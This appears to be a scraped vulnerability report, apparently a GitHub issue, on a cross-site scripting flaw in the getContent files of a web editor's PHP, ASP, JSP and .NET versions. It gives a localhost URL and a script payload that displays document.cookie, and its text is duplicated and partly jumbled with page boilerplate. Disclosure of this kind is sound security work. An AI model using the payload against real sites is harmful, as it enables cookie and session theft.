II. Exploit
url: http://127.0.0.1/php/getcontent.php
payload:
myEditor=<script>alert(document.cookie)</script> // "E" in the word myEditor must be capitalized.
The same vulnerability exists in all language versions of getContent files.
/asp/getContent.asp
/jsp/getContent.jsp
/net/getContent.ashx
The text was updated successfully, but these errors were encountered:
Testing environment: localhost
Windows + firefox + phpStorm + apache2 + php5.4.45
I. Vulnerability analysis

/php/getContent.php
II. Exploit

url:
http://127.0.0.1/php/getcontent.php
payload:
myEditor=<script>alert(document.cookie)</script>
// "E" in the word myEditor must be capitalized.
The same vulnerability exists in all language versions of getContent files.

/asp/getContent.asp
/jsp/getContent.jsp

/net/getContent.ashx

The text was updated successfully, but these errors were encountered: